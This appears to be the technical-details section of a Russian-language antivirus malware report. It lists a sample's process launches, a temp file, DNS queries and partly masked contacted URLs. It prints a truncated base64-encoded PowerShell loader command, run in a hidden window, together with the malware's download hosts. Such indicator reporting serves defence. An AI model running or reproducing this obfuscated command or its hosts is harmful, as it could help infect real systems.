Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABHAHQAZgB0AGEAYQBwAD0AKAAoACcATgB2AHUAJwArACcAZwBfAG0AJwApACsAJwBxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAGUAcgBwAHIATwBmAEkATA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1420
- %TEMP%\1328894.cvr
- 'ba#####p.webdungsan.com':80
- 'ng######euphachehanoi.com':80
- 'su#####tprediction.com':80
- 'hu####ngchina.com':80
- http://ba#####p.webdungsan.com/wp-admin/n/
- http://ng######euphachehanoi.com/wp-admin/kL/
- http://www.ng######euphachehanoi.com/wp-admin/kL/
- http://hu####ngchina.com/kic3kc/c/
- DNS ASK ba#####p.webdungsan.com
- DNS ASK ng######euphachehanoi.com
- DNS ASK no###ever.com
- DNS ASK su#####tprediction.com
- DNS ASK pa####itkpark.com
- DNS ASK xx###toy.top
- DNS ASK hu####ngchina.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABHAHQAZgB0AGEAYQBwAD0AKAAoACcATgB2AHUAJwArACcAZwBfAG0AJwApACsAJwBxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAGUAcgBwAHIATwBmAEkATA... (со скрытым окном)